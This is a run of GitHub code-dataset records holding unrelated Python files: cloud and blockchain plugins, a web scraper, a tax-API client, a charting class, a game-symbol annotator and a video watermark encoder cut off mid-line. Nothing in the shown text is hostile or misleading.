on_launch(event['request'], event['session'])\n \n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n \n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","repo_name":"Deepank308/Alexa-GitHub-Scraper","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":14463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70901105107","text":"from ape import plugins\nfrom ape.api.networks import LOCAL_NETWORK_NAME, ForkedNetworkAPI, NetworkAPI, create_network_type\nfrom ape_geth import GethProvider\nfrom ape_test import LocalProvider\n\nfrom .ecosystem import NETWORKS, PolygonZkEVM, PolygonZkEVMConfig\n\n\n@plugins.register(plugins.Config)\ndef config_class():\n return PolygonZkEVMConfig\n\n\n@plugins.register(plugins.EcosystemPlugin)\ndef ecosystems():\n yield PolygonZkEVM\n\n\n@plugins.register(plugins.NetworkPlugin)\ndef networks():\n for network_name, network_params in NETWORKS.items():\n yield \"polygon-zkevm\", network_name, create_network_type(*network_params)\n yield \"polygon-zkevm\", f\"{network_name}-fork\", ForkedNetworkAPI\n\n # NOTE: This works for local providers, as they get chain_id from themselves\n yield \"polygon-zkevm\", LOCAL_NETWORK_NAME, NetworkAPI\n\n\n@plugins.register(plugins.ProviderPlugin)\ndef providers():\n for network_name in NETWORKS:\n yield \"polygon-zkevm\", network_name, GethProvider\n\n yield \"polygon-zkevm\", LOCAL_NETWORK_NAME, LocalProvider\n","repo_name":"ApeWorX/ape-polygon-zkevm","sub_path":"ape_polygon_zkevm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30614751285","text":"# QUESTION URL: https://www.hackerrank.com/challenges/re-start-re-end/problem\n# STATUS: Wrong Answer\n\nS = input()\nk = input()\nimport re\npattern = re.compile(k)\nr = pattern.search(S)\nif bool(r): print(\"(-1, -1)\")\nwhile r:\n print(\"({0}, {1})\".format(r.start(), r.end() - 1))\n r = pattern.search(S,r.start() + 1)\n","repo_name":"Yash2003Bisht/ProblemSolutions","sub_path":"solutions/hackerrank/Re_start_____Re_end__/Re_start_____Re_end___2.py","file_name":"Re_start_____Re_end___2.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11025875467","text":"import logging\nimport os\nimport random\nimport time\nimport urllib\nfrom typing import Any, Dict, List, Tuple\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom tqdm import tqdm\n\nlogger = logging.getLogger(__name__)\n\n\ndef _create_initial_driver(driver_path: str, search_url: str) -> WebDriver:\n \"\"\"This function creates a chrome web-driver.\n\n Args:\n driver_path (str): Path of where the webdriver is saved\n search_url (str): String of which website to scrape\n\n Returns:\n WebDriver: Chrome webdriver\n \"\"\"\n\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--remote-debugging-port=9222\")\n\n driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n driver.get(search_url)\n\n assert driver.title is not \"\", \"The driver did not fetch the website\"\n return driver\n\n\ndef _find_images(driver: WebDriver) -> Tuple[List[WebElement], int]:\n image_elements = driver.find_elements_by_css_selector(\n \".ReactGridGallery_tile-viewport\"\n )\n return image_elements, len(image_elements)\n\n\ndef _random_waiting_time(min_seconds_sleep: int, max_seconds_sleep: int) -> float:\n return random.uniform(min_seconds_sleep, max_seconds_sleep)\n\n\ndef _create_expanded_driver(driver_params, image_params) -> WebDriver:\n\n driver_path = driver_params[\"driver_path\"]\n max_seconds_sleep = driver_params[\"max_seconds_sleep\"]\n min_seconds_sleep = driver_params[\"min_seconds_sleep\"]\n search_url = image_params[\"url\"]\n max_number_of_images = image_params[\"max_number_of_images\"]\n\n driver = _create_initial_driver(driver_path, search_url)\n\n _, number_of_images_visible = _find_images(driver)\n\n while number_of_images_visible < max_number_of_images:\n time.sleep(_random_waiting_time(min_seconds_sleep, max_seconds_sleep))\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n _, number_of_images_visible = _find_images(driver)\n logger.info(f\"Images found {number_of_images_visible} of {max_seconds_sleep}\")\n\n logger.info(f\"In total we found {number_of_images_visible} images\")\n\n return driver\n\n\ndef _retrieve_image_source(image_element, image_num) -> str:\n try:\n image_src_element = image_element.find_element_by_css_selector(\"img\")\n img_src = image_src_element.get_attribute(\"src\")\n return img_src\n except NoSuchElementException:\n return None\n\n\ndef _delete_all_files_in_folder(folder_path: str) -> None:\n for filename in os.listdir(folder_path):\n file_path = os.path.join(folder_path, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print(\"Failed to delete %s. Reason: %s\" % (file_path, e))\n\n\ndef _scrape_images(\n image_folder_path: str,\n image_elements: List[WebElement],\n number_of_total_entries: int,\n) -> None:\n\n for image_num, image_element in tqdm(enumerate(image_elements)):\n\n image_path = os.path.join(image_folder_path, f\"marathon_{image_num}.png\")\n img_src = _retrieve_image_source(image_element, image_num)\n if img_src is None:\n f\"Image {image_num} could not be retrieved\"\n\n urllib.request.urlretrieve(img_src, image_path)\n\n\ndef scrapping_images(params: Dict[str, Any]) -> None:\n\n driver_params = params[\"driver\"]\n image_params = params[\"image_scrapping\"]\n image_folder_path = image_params[\"image_folder\"]\n rescrape_bool = image_params[\"rescrape\"]\n\n driver = _create_expanded_driver(driver_params, image_params)\n image_elements, number_of_total_entries = _find_images(driver)\n\n if rescrape_bool:\n _delete_all_files_in_folder(image_folder_path)\n _scrape_images(image_folder_path, image_elements, number_of_total_entries)\n logger.info(\"Image re-scrapping finished\")\n else:\n logger.info(\"No re-scraping was conducted\")\n","repo_name":"paulmora-qb/legendary-broccoli","sub_path":"src/legendary_broccoli/pipelines/scrapping/scrapping_functions.py","file_name":"scrapping_functions.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11322684682","text":"from urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup \r\nurl=input('Enter url: ')\r\nhtml=urlopen(url).read()\r\nSoup=BeautifulSoup(html,'html.parser')\r\ntags=Soup('span')\r\n\r\nsum=0\r\nfor tag in tags:\r\n x = tag.contents[0]\r\n sum+= int(x)\r\nprint(sum) \r\n\r\n ","repo_name":"akshitaPrajapati/Web-Scraping","sub_path":"ScrapHTML.py","file_name":"ScrapHTML.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74190970704","text":"#! /usr/bin/python3.6\n\n\"\"\"Annotates the result of map_to_symbols with heuristic type information.\n\nThis file must be run after the following binaries, using the same --out_path:\n- dump_sections.py (to generate section_info and linked section .raw files)\n- map_to_symbols.py (to generate map_symbols.csv)\n\nThis program augments the output of map_to_symbols.py, adding file-level and\nRAM addresses of the identified symbols, as well as heuristically predicted\ncommon types (e.g. floats, strings, pointers, TTYD evts) and values.\"\"\"\n# Jonathan Aldrich 2021-01-26 ~ 2021-03-04\n\nimport codecs\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\nimport jdalibpy.bindatastore as bd\nimport jdalibpy.flags as flags\n\nFLAGS = flags.Flags()\n\n# Output directory; should contain these outputs from previous binaries:\n# - Section_info and linked sections from dump_sections.py\n# - map_symbols.csv file from map_to_symbols.py\n# Annotated symbols will be saved to /annotated_symbols.csv.\nFLAGS.DefineString(\"out_path\", \"\")\n\n# Whether to display debug strings.\nFLAGS.DefineInt(\"debug_level\", 1)\n\nclass AnnotateMapSymbolsError(Exception):\n def __init__(self, message=\"\"):\n self.message = message\n \ndef _InferType(view, size, exact):\n \"\"\"Uses simple heuristics to try to determine the type/value of a symbol.\"\"\"\n def _IsFloatCompatible(view, offset=0):\n u32 = view.ru32(offset)\n # Either 0.0 or in range +/- 1e-7 to 1e7.\n return not u32 or (0x33d6bf95 <= (u32 & 2**31-1) <= 0x4b189680)\n \n def _IsDoubleCompatible(view, offset=0):\n u64 = view.ru64(offset)\n # Either 0.0 or in range +/- 1e-7 to 1e7.\n return not u64 or (\n 0x3e7ad7f29abcaf48 <= (u64 & 2**63-1) <= 0x416312d000000000)\n \n def _IsPointerCompatible(view, offset=0):\n u32 = view.ru32(offset)\n # Either 0.0 or in slightly reduced range of valid pointers\n # (the range is reduced so as to not be ambiguous w/valid Shift-JIS).\n return not u32 or (0x80000000 <= u32 < 0x81400000)\n \n def _IsEvtCompatible(view, size, exact):\n offset = 0\n last_command = -1\n while offset < size:\n command = view.ru32(offset)\n # Each command must be between 0x1 and 0x77.\n if not (1 <= command & 0xffff <= 0x77):\n return False\n # Must end in 00000002, 00000001 (RETURN, END).\n if last_command == 2 and command == 1:\n if not exact:\n return True\n # Verify that this is the exact end of the evt command array.\n return offset + 4 == size\n # Advance by 4 bytes, plus 4 per argument to the evt command.\n offset += (command >> 16) * 4 + 4\n last_command = command\n # Reached maximum length of symbol without finding the end of an event.\n return False\n \n def _IsShiftJisCompatible(view, size, exact):\n offset = 0\n while offset < size:\n b = view.ru8(offset)\n if b == 0:\n # If not exactly at the end of the string, return False.\n if exact and offset + 1 != size:\n return False\n # End of string; double-check for false multi-byte sequences.\n try:\n s = codecs.decode(view.rcstring(0), \"shift-jis\")\n except:\n return False\n # String should be technically valid, but make sure\n # that string isn't empty or a likely false positive.\n return not (view.rcstring(0) in (b\"\", b\"\\x40\", b\"C0\"))\n elif 0x20 <= b < 0x7f or b in (9, 10, 13):\n # Printable one-byte sequence.\n offset += 1\n elif 0x81 <= b < 0xa0 or 0xe0 <= b <= 0xea or 0xed <= b <= 0xef:\n if offset + 1 == size:\n return False\n # Valid multi-byte sequence.\n b2 = view.ru8(offset + 1)\n if not 0x40 <= b2 <= 0xfc:\n return False\n offset += 2\n else:\n return False\n return False\n \n def _SanitizeString(s):\n s = s.replace(\"\\\\\", \"\\\\\\\\\")\n s = s.replace(\"\\t\", \"\\\\t\")\n s = s.replace(\"\\n\", \"\\\\n\")\n s = s.replace(\"\\r\", \"\\\\r\")\n return s\n\n bs = view.rbytes(size)\n # Check most restrictive types first: valid evts, common float constants, \n # Shift-JIS compatible strings of the exact length of the symbol.\n if exact and size & 3 == 0 and _IsEvtCompatible(view, size, exact=True):\n return (\"evt\", \"\")\n if size == 8 and view.ru64() == 0x4330000080000000:\n return (\"double\", \"to-int\")\n if size == 8 and view.ru64() == 0x4330000000000000:\n return (\"double\", \"to-int-mask\")\n if exact and _IsShiftJisCompatible(view, size, exact=True):\n s = codecs.decode(view.rcstring(), \"shift-jis\")\n return (\"string\", _SanitizeString(s))\n # If all zero bytes, return \"zero\".\n if sum(bs) == 0:\n return (\"zero\", 0.0)\n # Check for reasonable-looking floating-point, pointer, or vec3 values.\n if size == 4 and _IsFloatCompatible(view):\n return (\"float\", view.rf32())\n if size == 8 and _IsDoubleCompatible(view):\n return (\"double\", view.rf64())\n if size == 4 and _IsPointerCompatible(view):\n return (\"pointer\", \"%08x\" % view.ru32())\n if size == 12:\n if (_IsFloatCompatible(view, 0) and _IsFloatCompatible(view, 4) and\n _IsFloatCompatible(view, 8)):\n return (\"vec3\", \"%f, %f, %f\" % (\n view.rf32(0), view.rf32(4), view.rf32(8)))\n # Look for arbitrary floating-point arrays or non-exact-length evts/strings;\n # these are more likely to be false positives.\n if size & 3 == 0:\n if _IsEvtCompatible(view, size, exact=False):\n return (\"evt\", \"\")\n # TODO: Improve heuristics for detecting float arrays vs. strings?\n is_valid = True\n for offset in range(0, size, 4):\n if not _IsFloatCompatible(view, offset):\n is_valid = False\n break\n if is_valid:\n return (\"floatarr\", \"\")\n is_valid = True\n for offset in range(0, size, 4):\n if not _IsPointerCompatible(view, offset):\n is_valid = False\n break\n if is_valid:\n return (\"pointerarr\", \"\")\n if _IsShiftJisCompatible(view, size, exact=False):\n s = codecs.decode(view.rcstring(), \"shift-jis\")\n return (\"string\", _SanitizeString(s))\n # Not obviously compatible with any common types.\n return (None, None)\n \ndef _AnnotateSymbols(symbols, section_info, out_path):\n def _AddSectionInfoFields(s, section_info):\n section = section_info.loc[(s[\"area\"], s[\"sec_id\"])]\n s[\"sec_name\"] = section[\"name\"]\n s[\"sec_type\"] = section[\"type\"]\n ram_addr = section[\"ram_start\"]\n s[\"ram_addr\"] = (\n \"%08x\" % (int(ram_addr, 16) + int(s[\"sec_offset\"], 16))\n if isinstance(ram_addr, str) and ram_addr else np.nan\n )\n file_addr = section[\"file_start\"]\n s[\"file_addr\"] = (\n \"%08x\" % (int(file_addr, 16) + int(s[\"sec_offset\"], 16))\n if isinstance(file_addr, str) and file_addr else np.nan\n )\n return s\n \n def _InferSymbolType(s, stores):\n # Not a data symbol.\n if s[\"sec_type\"] != \"data\":\n return s\n # Symbol's section was not dumped, or out of range.\n section_lookup = \"%s-%02d\" % (s[\"area\"], s[\"sec_id\"])\n if section_lookup not in stores:\n return s\n offset = int(s[\"sec_offset\"], 16)\n if offset < 0:\n return s\n # Otherwise, infer the type and value of the symbol, if possible.\n view = stores[section_lookup].view(offset)\n (t, v) = _InferType(view, int(s[\"size\"], 16), exact=True)\n if t:\n s[\"type\"] = t\n s[\"value\"] = v\n return s\n\n # Create a copy of the symbols DataFrame with the desired output columns.\n df = pd.DataFrame(symbols, columns=[\n \"area\", \"sec_id\", \"sec_offset\", \"sec_name\", \"sec_type\", \"ram_addr\",\n \"file_addr\", \"name\", \"namespace\", \"size\", \"align\", \"type\", \"value\"])\n \n # Load previously dumped .DOL / .REL file sections into BDStores.\n stores = {}\n for sec_id in (0, 1, 7, 8, 9, 10, 11, 12):\n section_path = \"sections/_main/%02d.raw\" % sec_id\n store = bd.BDStore(big_endian=True)\n store.RegisterFile(out_path / section_path, offset=0)\n stores[\"_main-%02d\" % sec_id] = store\n \n rels_dir = out_path / \"sections/rel_linked\"\n areas = [f.name for f in os.scandir(rels_dir) if f.is_dir()]\n for area in areas:\n for sec_id in range(1,6):\n store = bd.BDStore(big_endian=True)\n store.RegisterFile(rels_dir / area / (\"%02d.raw\" % sec_id), offset=0)\n stores[\"%s-%02d\" % (area, sec_id)] = store\n \n # Fill in remaining columns based on section_info and dumped sections.\n if FLAGS.GetFlag(\"debug_level\"):\n print(\"Converting section offsets to ram/file addresses...\")\n df = df.apply(\n lambda s: _AddSectionInfoFields(s, section_info), axis=1)\n \n if FLAGS.GetFlag(\"debug_level\"):\n print(\"Inferring symbol types...\")\n df = df.apply(lambda s: _InferSymbolType(s, stores), axis=1)\n \n # Output the final table of joined symbols.\n df.to_csv(out_path / \"annotated_symbols.csv\", index=False)\n\ndef main(argc, argv):\n out_path = FLAGS.GetFlag(\"out_path\")\n if not out_path or not os.path.exists(Path(out_path)):\n raise AnnotateMapSymbolsError(\n \"--out_path must point to a valid directory.\")\n out_path = Path(out_path)\n \n if not os.path.exists(out_path / \"section_info.csv\"):\n raise AnnotateMapSymbolsError(\n \"You must first run dump_sections.py using the same --out_path.\")\n section_info = pd.read_csv(out_path / \"section_info.csv\")\n section_info = section_info.set_index([\"area\", \"id\"])\n \n if not os.path.exists(out_path / \"map_symbols.csv\"):\n raise AnnotateMapSymbolsError(\n \"You must first run map_to_symbols.py using the same --out_path.\")\n symbols = pd.read_csv(out_path / \"map_symbols.csv\")\n \n _AnnotateSymbols(symbols, section_info, out_path)\n\nif __name__ == \"__main__\":\n (argc, argv) = FLAGS.ParseFlags(sys.argv[1:])\n main(argc, argv)\n","repo_name":"jdaster64/ttyd-utils","sub_path":"source/annotate_map_symbols.py","file_name":"annotate_map_symbols.py","file_ext":"py","file_size_in_byte":10579,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"12262648616","text":"import requests\nfrom django.conf import settings \nimport json\n\ndef conseguir_TOKEN(client_id,client_secret):\n URL = f\"https://api-seguridad.sunat.gob.pe/v1/clientesextranet/{client_id}/oauth2/token/\"\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n json = {\n \"grant_type\": \"client_credentials\",\n \"scope\" :\"https://api.sunat.gob.pe/v1/contribuyente/contribuyentes\",\n \"client_id\" :client_id ,\n \"client_secret\" :client_secret,\n }\n response = requests.post(URL,data=json,headers=headers)\n return response.json()[\"access_token\"]\n\ndef validar_ruc(data : dict[str,any]) -> dict[str:any]:\n url = f'https://api.sunat.gob.pe/v1/contribuyente/contribuyentes/{data[\"numRuc\"]}/validarcomprobante'\n\n headers : dict[str:str] = {\n \"Authorization\" : \"Bearer \"+ conseguir_TOKEN( settings.CLIENT_ID,settings.CLIENT_SECRET)\n }\n\n body : dict[str: any] = dict(data.items())\n \n if not body[\"monto\"]: del body[\"monto\"]\n del body[\"csrfmiddlewaretoken\"]\n \n\n response = requests.post(url,json=body,headers=headers)\n print(response.content)\n return response.json()\n\ndef validar_numero_ruc(n_ruc)-> list[bool,dict[str:any]]:\n URL = f\"https://api.apis.net.pe/v1/ruc?numero={n_ruc}\"\n \n JSON = requests.get(url=URL)\n response: dict[str:any] = JSON.json()\n if response.get(\"error\",None):\n return [False, response]\n return [True,response]\n\n","repo_name":"feijoes/Freelance-works","sub_path":"Python/DjangoSunat/contabilidad/api/libs.py","file_name":"libs.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7439828253","text":"\"\"\"复式条形统计图和平均数\n\n关于程序的几点说明:\n1. 程序改进了 data1.py (G417) 中的 Data 类,使绘制条形统计图的方法 bar() 和 barh() 现在可以绘制表现多行数据的\n 复式条形统计图。\n2. 程序还为 Data 类增添了两个新的方法 avg_row() 和 avg_col(),分别用于求指定行或列数据的平均数。\n\"\"\"\n\nimport sys\nfrom pathlib import Path\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n# 把上级目录添加到模块搜索路径,以便引用其它项目模块。\nsys.path.append(str(Path(__file__).parents[1]))\nfrom g323_table.table import Table\n\n\nclass Data(Table):\n \"\"\"Data 类是 Table 类的子类。Data 类继承了 Table 类的属性和方法,还拥有绘制复式条形统计图以及求平均数的方法。\n\n 方法\n ----\n bar(*row): 为给定的一行或多行数据绘制纵向复式条形统计图。\n barh(*row): 为给定的一行或多行数据绘制横向复式条形统计图。\n avg_row(row): 计算第 row 行数据的平均数,如果没有指定 row, 计算每一行数据的平均数。\n avg_col(col): 计算第 col 列数据的平均数,如果没有指定 col, 计算每一列数据的平均数。\n \"\"\"\n def bar(self, *rows, title=None, xlabel=None, ylabel=None, int_tick=True):\n \"\"\"为表格中给定的一行或多行数据绘制纵向复式条形统计图。\n\n rows: 绘制哪几行数据,默认是所有行。\n title: 复式条形统计图的标题。\n xlabel: 复式条形统计图横轴说明。\n ylabel: 复式条形统计图纵轴说明。\n int_tick: 刻度值是否必须为整数。\n \"\"\"\n _, ax = plt.subplots(figsize=(10, 6))\n ax.yaxis.set_major_locator(plt.MaxNLocator(integer=int_tick))\n # 如果一行都没给,绘制所有行。\n n = len(rows)\n if n == 0:\n n = self.row_count\n rows = tuple(range(n))\n # 根据一组竖条的数目,设置一组竖条的宽度。\n if n == 1:\n WIDTH = 0.4\n elif n < 5:\n WIDTH = 0.6\n else:\n WIDTH = 0.8\n # 获取一个竖条的宽度。\n width = WIDTH / n\n x = range(self.col_count)\n for i, row in enumerate(rows):\n # 获取代表一行数据的一组竖条,每个竖条中点的位置。\n pos = [value - WIDTH/2 + width/2 + width * i for value in x]\n rect = ax.bar(pos, self.data[row], width=width, label=self.row_headers[row])\n ax.bar_label(rect)\n ax.set_xticks(x, self.col_headers)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.legend()\n plt.show()\n\n def barh(self, *rows, title=None, xlabel=None, ylabel=None, int_tick=True):\n \"\"\"为表格中给定的一行或多行数据绘制横向复式条形统计图。\n\n rows: 绘制哪几行数据,默认是所有行。\n title: 复式条形统计图的标题。\n xlabel: 复式条形统计图横轴说明。\n ylabel: 复式条形统计图纵轴说明。\n int_tick: 刻度值是否必须为整数。\n \"\"\"\n _, ax = plt.subplots(figsize=(10, 6))\n ax.xaxis.set_major_locator(plt.MaxNLocator(integer=int_tick))\n # 如果一行都没给,绘制所有行。\n n = len(rows)\n if n == 0:\n n = self.row_count\n rows = tuple(range(n))\n # 根据一组竖条的数目,设置一组竖条的高度。\n if n == 1:\n HEIGHT = 0.4\n elif n < 5:\n HEIGHT = 0.6\n else:\n HEIGHT = 0.8\n # 获取一个竖条的高度。\n height = HEIGHT / n\n y = range(self.col_count)\n for i, row in enumerate(rows):\n # 获取代表一行数据的一组竖条,每个竖条中点的位置。\n pos = [value + HEIGHT/2 - height/2 - height * i for value in y]\n rect = ax.barh(pos, self.data[row], height=height, label=self.row_headers[row])\n ax.bar_label(rect)\n ax.set_yticks(y, self.col_headers)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.legend()\n plt.show()\n\n def avg_row(self, row=None, rounding=0):\n \"\"\"计算第 row 行数据的平均数,如果没有指定 row, 返回一个包含每一行数据平均数的列表。\n\n row: 计算哪一行数据的平均数。如果没指定,计算每一行数据的平均数。\n rounding: 平均数保留几位小数。\n \"\"\"\n def avg_one_row(row):\n \"\"\"计算第 row 行数据的平均数。\"\"\"\n avg = sum(self.data[row])/self.col_count\n if rounding == 0:\n return round(avg)\n return round(avg, rounding)\n\n if row is not None:\n return avg_one_row(row)\n avgs = []\n for i in range(self.row_count):\n avgs.append(avg_one_row(i))\n return avgs\n\n def avg_col(self, col=None, rounding=0):\n \"\"\"计算第 col 列数据的平均数,如果没有指定 col, 返回一个包含每一列数据平均数的列表。\n\n col: 计算哪一列数据的平均数。如果没指定,计算每一列数据的平均数。\n rounding: 平均数保留几位小数。\n \"\"\"\n def avg_one_col(col):\n \"\"\"计算第 col 列数据的平均数。\"\"\"\n total = 0\n for i in range(self.row_count):\n total += self.data[i][col]\n avg = total / self.row_count\n if rounding == 0:\n return round(avg)\n return round(avg, rounding)\n\n if col is not None:\n return avg_one_col(col)\n avgs = []\n for j in range(self.col_count):\n avgs.append(avg_one_col(j))\n return avgs\n\n\nTITLE = '喜欢某种蔬菜的学生人数统计图'\nLABEL_ITEM = '蔬菜'\nLABEL_VALUE = '喜欢的人数'\nVEGETABLES = ['西红柿', '萝卜', '黄瓜', '茄子']\nCLASSES = ['一班', '二班', '三班']\n\n# 创建 data 对象并生成 data 对象的数据。\ndata = Data(row_headers=CLASSES, col_headers=VEGETABLES)\ndata.random()\nprint(data)\n\n# 显示每行的平均数和每列的平均数。\nprint(f'每行的平均数是: {data.avg_row()}')\nprint(f'每列的平均数是: {data.avg_col()}')\n\n# 在 Matplotlib 中使用中文字体,SimHei 是 Windows 的内置字体,Arial Unicode MS 是 MacOS 的内置字体。\nfont_names = ['SimHei', 'Arial Unicode MS']\nmpl.rcParams['font.sans-serif'] = font_names + mpl.rcParams['font.sans-serif']\n\n# 绘制纵向和横向复式条形统计图。\ndata.bar(title=TITLE, xlabel=LABEL_ITEM, ylabel=LABEL_VALUE)\ndata.barh(title=TITLE, ylabel=LABEL_ITEM, xlabel=LABEL_VALUE)\n","repo_name":"feli10/math-coding","sub_path":"_cn/g428_mean_value/data2.py","file_name":"data2.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40040244976","text":"# Mohammad Qureshi\r\n# PSID 1789301\r\n# LAB 12.7\r\n\r\n\r\n# FUNCTION TO INPUT AGE AND SET ERROR MESSAGES\r\ndef get_age():\r\n input_age = int(input())\r\n if input_age < 18:\r\n raise ValueError(\"Invalid age.\")\r\n if input_age > 75:\r\n raise ValueError(\"Invalid age.\")\r\n return input_age\r\n\r\n# CALCULATE HEART RATE\r\ndef fat_burning_heart_rate(age): # function to calculate heart rate\r\n heart_rate = (((220 - age) * 70) / 100)\r\n return heart_rate\r\n\r\n# MAIN FUNCTION\r\nif __name__ == \"__main__\":\r\n try:\r\n age = get_age()\r\n heart_rate = fat_burning_heart_rate(age)\r\n print(\"Fat burning heart rate for a {} year-old: {} bpm\".format(age, heart_rate))\r\n except ValueError as errormsg:\r\n print(errormsg)\r\n print(\"Could not calculate heart rate info.\")\r\n print()\r\n","repo_name":"MohammadQu/Summer2348","sub_path":"Homework4/ZyLab12.7.py","file_name":"ZyLab12.7.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19512279250","text":"from loguru import logger\n\nfrom ..domain.model import Quote\nfrom ..foundation import Pair\nfrom ..repository.quote_repo import QuoteRepo\n\n\nclass GetLastRateUseCase:\n def __init__(self, quote_repo: QuoteRepo) -> None:\n self._quote_repo = quote_repo\n\n async def excecute(self, pair: Pair) -> Quote:\n try:\n quote = await self._quote_repo.get_last_quote(pair=pair)\n except self._quote_repo.NotFound as ex:\n logger.error(f\"Can't get last quote for {pair} {ex}\")\n raise\n return quote\n","repo_name":"kancom/jaxel_task","sub_path":"src/trial/application/use_case/last_rate_uc.py","file_name":"last_rate_uc.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41471521277","text":"import cv2\nimport numpy as np\n\nclass DctEncoder:\n\n def __init__(self, key=None, alpha=20):\n self.key = key\n self.alpha = alpha\n\n def read_wm(self, wm):\n self.wm = wm[0]\n\n def wm_capacity(self, frame_shape):\n row, col, channels = frame_shape\n block_num = row * col // 64\n return (1, block_num)\n\n def encode(self, yuv):\n blk_shape = (8, 8)\n channel = yuv[:,:,1]\n lum_mask = self.luminance_mask(yuv[:,:,0])\n tex_mask = self.texture_mask(yuv[:,:,0])\n mask = tex_mask * lum_mask\n c = 0\n for i in range(channel.shape[0] // blk_shape[0]):\n for j in range(channel.shape[1] // blk_shape[1]):\n blk = channel[i * blk_shape[0] : i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1] : j * blk_shape[1] + blk_shape[1]]\n coeffs = cv2.dct(blk)\n step = self.alpha * mask[i][j]\n step2 = step + step\n if self.wm[c] == 0:\n coeffs[2][1] = np.sign(coeffs[2][1]) * np.floor(abs(coeffs[2][1]) / step2) * step2\n else:\n coeffs[2][1] = np.sign(coeffs[2][1]) * (np.floor(abs(coeffs[2][1]) / step2) * step2 + step)\n channel[i * blk_shape[0] : i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1] : j * blk_shape[1] + blk_shape[1]] = cv2.idct(coeffs)\n c += 1\n return yuv\n\n def luminance_mask(self, lum):\n blk_shape = (8, 8)\n rows = lum.shape[0] // blk_shape[0]\n cols = lum.shape[1] // blk_shape[1]\n mask = np.zeros((rows, cols))\n for i in range(rows):\n for j in range(cols):\n blk = lum[i * blk_shape[0]:i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1]:j * blk_shape[1] + blk_shape[1]]\n coeffs = cv2.dct(blk)\n mask[i][j] = coeffs[0][0]\n l_min, l_max = 90, 255\n f_max = 2\n mask /= 8\n mean = max(l_min, np.mean(mask))\n f_ref = 1 + (mean - l_min) * (f_max - 1) / (l_max - l_min)\n for i in range(mask.shape[0]):\n for j in range(mask.shape[1]):\n if mask[i][j] > mean:\n mask[i][j] = 1 + (mask[i][j] - mean) / (l_max - mean) * (f_max - f_ref)\n elif mask[i][j] < 15:\n mask[i][j] = 1.25\n elif mask[i][j] < 25:\n mask[i][j] = 1.125\n else:\n mask[i][j] = 1\n return mask\n\n\n def texture_mask(self, lum):\n blk_shape = (8, 8)\n rows = lum.shape[0] // blk_shape[0]\n cols = lum.shape[1] // blk_shape[1]\n mask = np.full((rows, cols), 1.0)\n for i in range(rows):\n for j in range(cols):\n blk = lum[i * blk_shape[0]:i * blk_shape[0] + blk_shape[0],\n j * blk_shape[1]:j * blk_shape[1] + blk_shape[1]]\n coeffs = cv2.dct(blk)\n coeffs = np.abs(coeffs)\n dcl = coeffs[0][0] + coeffs[0][1] + coeffs[0][2] + coeffs[1][0] + coeffs[1][1] + coeffs[2][0]\n eh = np.sum(coeffs) - dcl\n if eh > 125:\n e = coeffs[3][0] + coeffs[4][0] + coeffs[5][0] + coeffs[6][0] + \\\n coeffs[0][3] + coeffs[0][4] + coeffs[0][5] + coeffs[0][6] + \\\n coeffs[2][1] + coeffs[1][2] + coeffs[2][2] + coeffs[3][3]\n h = eh - e\n l = dcl - coeffs[0][0]\n a1, b1 = 2.3, 1.6\n a2, b2 = 1.4, 1.1\n l_e, le_h = l / e, (l + e) / h\n if eh > 900:\n if (l_e >= a2 and le_h >= b2) or (l_e >= b2 and le_h >= a2) or le_h > 4:\n mask[i][j] = 1.125 if l + e <= 400 else 1.25\n else:\n mask[i][j] = 1 + 1.25 * (eh - 290) / (1800 - 290)\n else:\n if (l_e >= a1 and le_h >= b1) or (l_e >= b1 and le_h >= a1) or le_h > 4:\n mask[i][j] = 1.125 if l + e <= 400 else 1.25\n elif e + h > 290:\n mask[i][j] = 1 + 1.25 * (eh - 290) / (1800 - 290)\n return 